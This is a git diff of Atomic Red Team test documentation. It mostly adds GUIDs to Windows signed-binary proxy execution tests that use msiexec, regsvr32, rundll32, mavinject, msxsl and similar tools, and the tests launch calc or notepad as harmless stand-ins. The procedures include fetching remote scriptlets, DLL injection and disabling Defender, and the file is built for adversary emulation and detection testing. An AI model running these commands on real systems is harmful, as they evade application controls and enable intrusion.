## Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL + +auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec + Execute arbitrary DLL file stored locally. Commonly seen in application installation. Upon execution, a window titled "Boom!" will open that says "Locked and Loaded!". For 32 bit systems change the dll_payload argument to the Win32 folder. By default, if the src folder is not in place, it will download the 64 bit version. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218.007\src\x64\T1218.dll| @@ -115,7 +121,7 @@ msiexec.exe /y "#{dll_payload}" ##### Description: T1218.dll must exist on disk at specified location (#{dll_payload}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1218.008/T1218.008.md b/atomics/T1218.008/T1218.008.md index be140831..a05669ab 100644 --- a/atomics/T1218.008/T1218.008.md +++ b/atomics/T1218.008/T1218.008.md @@ -13,15 +13,17 @@ Adversaries may abuse odbcconf.exe to bypass application control solutions that
## Atomic Test #1 - Odbcconf.exe - Execute Arbitrary DLL -Execute arbitrary DLL file stored locally. +auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2 + +Execute arbitrary DLL file stored locally. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll| @@ -40,7 +42,7 @@ odbcconf.exe /S /A {REGSVR "#{dll_payload}"} ##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1218.009/T1218.009.md b/atomics/T1218.009/T1218.009.md index 0ee1701a..14171284 100644 --- a/atomics/T1218.009/T1218.009.md +++ b/atomics/T1218.009/T1218.009.md @@ -14,15 +14,17 @@ Both utilities may be used to bypass application control through use of attribut
## Atomic Test #1 - Regasm Uninstall Method Call Test -Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn't really execute either." will be displayed. +auto_generated_guid: 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 + +Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn't really execute either." will be displayed. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Location of the payload | Path | %tmp%\T1218.009.dll| | source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder\T1218.009\src\T1218.009.cs| @@ -47,7 +49,7 @@ del #{output_file} >nul 2>&1 ##### Description: The CSharp source file must exist on disk at specified location (#{source_file}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{source_file}) {exit 0} else {exit 1} +if (Test-Path #{source_file}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -62,16 +64,18 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Regsvcs Uninstall Method Call Test + +auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126 + Executes the Uninstall Method, No Admin Rights Required, Requires SNK. Upon execution, "I shouldn't really execute" will be displayed along with other information about the assembly being installed. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Location of the payload | Path | $Env:TEMP\T1218.009.dll| | source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder\T1218.009\src\T1218.009.cs| @@ -102,7 +106,7 @@ Remove-Item $parentpath\T1218.009.tlb -ErrorAction Ignore | Out-Null ##### Description: The CSharp source file must exist on disk at specified location (#{source_file}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{source_file}) {exit 0} else {exit 1} +if (Test-Path #{source_file}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1218.010/T1218.010.md b/atomics/T1218.010/T1218.010.md index 043c0a8c..e63f0519 100644 --- a/atomics/T1218.010/T1218.010.md +++ b/atomics/T1218.010/T1218.010.md @@ -22,15 +22,17 @@ Regsvr32.exe can also be leveraged to register a COM Object used to establish pe
## Atomic Test #1 - Regsvr32 local COM scriptlet execution -Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. +auto_generated_guid: 449aa403-6aba-47ce-8a37-247d21ef0306 + +Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | filename | Name of the local file, include path. | Path | PathToAtomicsFolder\T1218.010\src\RegSvr32.sct| | regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32| @@ -51,7 +53,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr ##### Description: Regsvr32.sct must exist on disk at specified location (#(unknown)) ##### Check Prereq Commands: ```powershell -if (Test-Path #(unknown)) {exit 0} else {exit 1} +if (Test-Path #(unknown)) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -66,16 +68,18 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Regsvr32 remote COM scriptlet execution + +auto_generated_guid: c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 + Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable windows defender real-time protection to fix it. Upon execution, calc.exe will be launched. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | URL to hosted sct file | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct| | regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32| @@ -98,15 +102,17 @@ windows defender real-time protection to fix it. Upon execution, calc.exe will b
## Atomic Test #3 - Regsvr32 local DLL execution -Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. +auto_generated_guid: 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b + +Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_name | Name of DLL to Execute, DLL Should export DllRegisterServer | Path | PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll| | regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32| @@ -127,7 +133,7 @@ IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dl ##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{dll_name}) {exit 0} else {exit 1} +if (Test-Path #{dll_name}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -142,15 +148,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - Regsvr32 Registering Non DLL -Replicating observed Gozi maldoc behavior registering a dll with an altered extension +auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 + +Replicating observed Gozi maldoc behavior registering a dll with an altered extension **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_file | Path to renamed dll file to be registered | Path | %temp%\shell32.jpg| | regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32| @@ -175,7 +183,7 @@ Replicating observed Gozi maldoc behavior registering a dll with an altered exte ##### Description: Test requires a renamed dll file ##### Check Prereq Commands: ```cmd -if exist #{dll_file} ( exit 0 ) else ( exit 1 ) +if exist #{dll_file} ( exit 0 ) else ( exit 1 ) ``` ##### Get Prereq Commands: ```cmd @@ -189,15 +197,17 @@ copy "C:\Windows\System32\shell32.dll" "#{dll_file}"
## Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer -Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer. +auto_generated_guid: 9d71c492-ea2e-4c08-af16-c6994cdf029f + +Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_name | Name of DLL to Install | String | PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll| | regsvr32path | Default location of Regsvr32.exe | String | C:\Windows\system32| @@ -218,7 +228,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr ##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{dll_name}) {exit 0} else {exit 1} +if (Test-Path #{dll_name}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md index a49be86f..9af355b7 100644 --- a/atomics/T1218.011/T1218.011.md +++ b/atomics/T1218.011/T1218.011.md @@ -28,15 +28,17 @@ Rundll32 can also be used to execute scripts such as JavaScript. This can be don
## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject -Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. +auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be + +Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct| @@ -57,17 +59,19 @@ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObj
## Atomic Test #2 - Rundll32 execute VBscript command + +auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb + Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ Upon execution calc.exe will be launched - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_execute | Command for rundll32.exe to execute | string | calc.exe| @@ -88,17 +92,19 @@ rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.
## Atomic Test #3 - Rundll32 advpack.dll Execution + +auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89 + Test execution of a command using rundll32.exe with advpack.dll. Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml Upon execution calc.exe will be launched - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218.011\src\T1218.011.inf| @@ -117,7 +123,7 @@ rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_Singl ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -132,18 +138,20 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - Rundll32 ieadvpack.dll Execution + +auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9 + Test execution of a command using rundll32.exe with ieadvpack.dll. Upon execution calc.exe will be launched Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218.011\src\T1218.011.inf| @@ -162,7 +170,7 @@ rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_Sin ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -177,17 +185,19 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - Rundll32 syssetup.dll Execution + +auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125 + Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf| @@ -206,7 +216,7 @@ rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -221,17 +231,19 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #6 - Rundll32 setupapi.dll Execution + +auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19 + Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf| @@ -250,7 +262,7 @@ rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execu ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -265,13 +277,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll + +auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3 + IcedID uses this TTP as follows: rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta Trickbot uses this TTP as follows: rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript" - **Supported Platforms:** Windows @@ -295,15 +309,17 @@ rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteu
## Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll -Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. +auto_generated_guid: 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 + +Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | exe_to_launch | Path of the executable to launch | path | %windir%\System32\notepad.exe| diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md index 5e7cdbfd..cc3c2998 100644 --- a/atomics/T1218/T1218.md +++ b/atomics/T1218/T1218.md @@ -24,15 +24,17 @@
## Atomic Test #1 - mavinject - Inject DLL into running process -Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. +auto_generated_guid: c426dacf-575d-4937-8611-a148a86a5e61 + +Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | process_id | PID of process receiving injection | string | 1000| | dll_payload | DLL to inject | Path | PathToAtomicsFolder\T1218\src\x64\T1218.dll| @@ -52,7 +54,7 @@ mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload} ##### Description: T1218.dll must exist on disk at specified location (#{dll_payload}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -67,15 +69,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code -Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. +auto_generated_guid: d590097e-d402-44e2-ad72-2c6aa1ce78b1 + +Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | powershell_code | PowerShell code to execute | string | Start-Process calc.exe| @@ -96,15 +100,17 @@ SyncAppvPublishingServer.exe "n; #{powershell_code}"
## Atomic Test #3 - Register-CimProvider - Execute evil dll -Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB +auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655 + +Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll| @@ -123,7 +129,7 @@ C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} ##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -138,17 +144,19 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - InfDefaultInstall.exe .inf Execution + +auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef + Test execution of a .inf using InfDefaultInstall.exe Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf| @@ -167,7 +175,7 @@ InfDefaultInstall.exe #{inf_to_execute} ##### Description: INF file must exist on disk at specified location (#{inf_to_execute}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -182,15 +190,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File -Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file. +auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2 + +Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_url | url to document | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx| @@ -210,7 +220,7 @@ call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}" ##### Description: Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided ##### Check Prereq Commands: ```powershell -if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} +if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -224,15 +234,17 @@ write-host "Install Microsoft Word or provide correct path."
## Atomic Test #6 - Microsoft.Workflow.Compiler.exe Payload Execution -Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe +auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e + +Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | xml_payload | XML to execution | path | PathToAtomicsFolder\T1218\src\T1218.xml| | mwcpath | Default location of Microsoft.Workflow.Compiler.exe | Path | C:\Windows\Microsoft.NET\Framework64\v4.0.30319| @@ -253,7 +265,7 @@ Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly tha ##### Description: .Net must be installed for this test to work correctly. ##### Check Prereq Commands: ```powershell -if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} +if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -267,15 +279,17 @@ write-host ".Net must be installed for this test to work correctly."
## Atomic Test #7 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions -Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe +auto_generated_guid: 4cc40fd7-87b8-4b16-b2d7-57534b86b911 + +Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | xml_payload | XML to execution | path | PathToAtomicsFolder\T1218\src\T1218.xml| | renamed_binary | renamed Microsoft.Workflow.Compiler | path | PathToAtomicsFolder\T1218\src\svchost.exe| @@ -298,7 +312,7 @@ Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net as ##### Check Prereq Commands: ```powershell Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force -if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} +if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -312,6 +326,9 @@ write-host "you need to rename workflow complier before you run this test"
## Atomic Test #8 - Invoke-ATHRemoteFXvGPUDisablementCommand base test + +auto_generated_guid: 9ebe7901-7edf-45c0-b5c7-8366300919db + RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted. 
@@ -321,14 +338,13 @@ Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts. Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | module_name | Specifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses module load order, a module name must be specified. | string | foo| | module_path | Specifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\Documents\WindowsPowerShell\Modules. | string | $PWD| @@ -350,7 +366,7 @@ Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md index e569b4f2..b22acd43 100644 --- a/atomics/T1219/T1219.md +++ b/atomics/T1219/T1219.md @@ -18,8 +18,10 @@ Admin tools such as TeamViewer have been used by several groups targeting instit
## Atomic Test #1 - TeamViewer Files Detected Test on Windows -An adversary may attempt to trick the user into downloading teamviewer and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed. +auto_generated_guid: 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 + +An adversary may attempt to trick the user into downloading teamviewer and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed. **Supported Platforms:** Windows @@ -52,8 +54,10 @@ Remove-Item $file1 -ErrorAction Ignore | Out-Null
## Atomic Test #2 - AnyDesk Files Detected Test on Windows -An adversary may attempt to trick the user into downloading AnyDesk and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed. +auto_generated_guid: 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 + +An adversary may attempt to trick the user into downloading AnyDesk and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed. **Supported Platforms:** Windows @@ -83,8 +87,10 @@ Remove-Item $file1 -ErrorAction Ignore
## Atomic Test #3 - LogMeIn Files Detected Test on Windows -An adversary may attempt to trick the user into downloading LogMeIn and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. +auto_generated_guid: d03683ec-aae0-42f9-9b4c-534780e0f8e1 + +An adversary may attempt to trick the user into downloading LogMeIn and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. **Supported Platforms:** Windows diff --git a/atomics/T1220/T1220.md b/atomics/T1220/T1220.md index b38e74bc..43a4c44f 100644 --- a/atomics/T1220/T1220.md +++ b/atomics/T1220/T1220.md @@ -31,15 +31,17 @@ Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
## Atomic Test #1 - MSXSL Bypass using local files -Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. +auto_generated_guid: ca23bfb2-023f-49c5-8802-e66997de462d + +Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | xmlfile | Location of the test XML file on the local filesystem. | Path | PathToAtomicsFolder\T1220\src\msxslxmlfile.xml| | xslfile | Location of the test XSL script file on the local filesystem. | Path | PathToAtomicsFolder\T1220\src\msxslscript.xsl| @@ -59,7 +61,7 @@ C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} ##### Description: XML file must exist on disk at specified location (#{xmlfile}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{xmlfile}) {exit 0} else {exit 1} +if (Test-Path #{xmlfile}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -69,7 +71,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato ##### Description: XSL file must exist on disk at specified location (#{xslfile}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{xslfile}) {exit 0} else {exit 1} +if (Test-Path #{xslfile}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -84,15 +86,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
